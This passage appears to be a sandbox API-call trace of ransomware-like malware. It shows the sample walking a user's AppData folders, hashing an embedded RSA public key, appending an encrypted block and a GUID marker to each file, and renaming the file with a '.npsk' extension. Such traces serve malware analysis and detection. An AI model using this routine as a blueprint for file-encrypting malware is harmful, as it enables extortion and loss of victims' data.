KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.787] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.787] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.787] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b21b0) returned 1 [0217.788] CryptCreateHash (in: hProv=0x7b21b0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.788] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.788] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.788] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.788] GetLastError () returned 0x0 [0217.788] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.788] CryptReleaseContext (hProv=0x7b21b0, dwFlags=0x0) returned 1 [0217.788] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.788] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.788] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.789] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0217.789] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x8000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.789] WriteFile (in: hFile=0x61c, lpBuffer=0x3aa1ce8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3aa1ce8*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.790] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.790] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.790] CloseHandle (hObject=0x61c) returned 1 [0217.795] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat.npsk")) returned 1 [0217.797] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UV0DUWVB", cAlternateFileName="")) returned 1 [0217.798] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VGMTOI09", cAlternateFileName="")) returned 1 [0217.798] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VGMTOI09", cAlternateFileName="")) returned 0 [0217.798] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0217.798] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0217.798] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0217.798] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\") returned="Services\\" [0217.798] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0217.798] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0217.798] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0217.799] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0217.799] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0217.799] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0217.799] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0217.799] PathFindFileNameW (pszPath="") returned="" [0217.799] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5616fca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x2bf7e690, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x2bf7e690, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0217.800] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5616fca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x2bf7e690, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x2bf7e690, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0217.801] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5616fca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x2bf7e690, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x2bf7e690, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0217.801] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0217.801] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0217.801] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0217.801] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\") returned="AU\\" [0217.801] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0217.801] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0217.801] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0217.801] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0217.801] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0217.801] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0217.801] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0217.801] PathFindFileNameW (pszPath="") returned="" [0217.801] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7eea3160, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7eec92c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eec92c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0217.803] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7eea3160, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7eec92c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eec92c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0217.803] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7eec92c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7eec92c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eec92c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x8e062, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="au.cab", cAlternateFileName="")) returned 1 [0217.803] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab") returned=".cab" [0217.803] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.804] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=581730) returned 1 [0217.804] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.806] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x8e03c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.806] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.808] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x25805, lpOverlapped=0x0) returned 1 [0217.811] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.811] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.811] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.811] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b2128) returned 1 [0217.813] CryptCreateHash (in: hProv=0x7b2128, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.813] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.813] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.813] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.813] GetLastError () returned 0x0 [0217.813] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.813] CryptReleaseContext (hProv=0x7b2128, dwFlags=0x0) returned 1 [0217.813] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.813] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.813] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.814] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0217.815] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x8e062, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.815] WriteFile (in: hFile=0x61c, lpBuffer=0x3aa1ce8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3aa1ce8*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.816] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.816] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.816] CloseHandle (hObject=0x61c) returned 1 [0217.834] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab.npsk")) returned 1 [0217.836] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7eec92c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7eec92c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eec92c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x2d400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="au.msi", cAlternateFileName="")) returned 1 [0217.836] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi") returned=".msi" [0217.836] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.837] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=185344) returned 1 [0217.837] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.839] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x2d3da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.839] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.841] SetFilePointer (in: hFile=0x61c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0217.841] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x25805, lpOverlapped=0x0) returned 1 [0217.843] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.843] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.843] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.843] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b2128) returned 1 [0217.844] CryptCreateHash (in: hProv=0x7b2128, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.844] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.845] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.845] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.845] GetLastError () returned 0x0 [0217.845] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.845] CryptReleaseContext (hProv=0x7b2128, dwFlags=0x0) returned 1 [0217.845] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.845] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.845] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.846] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0217.847] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x2d400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 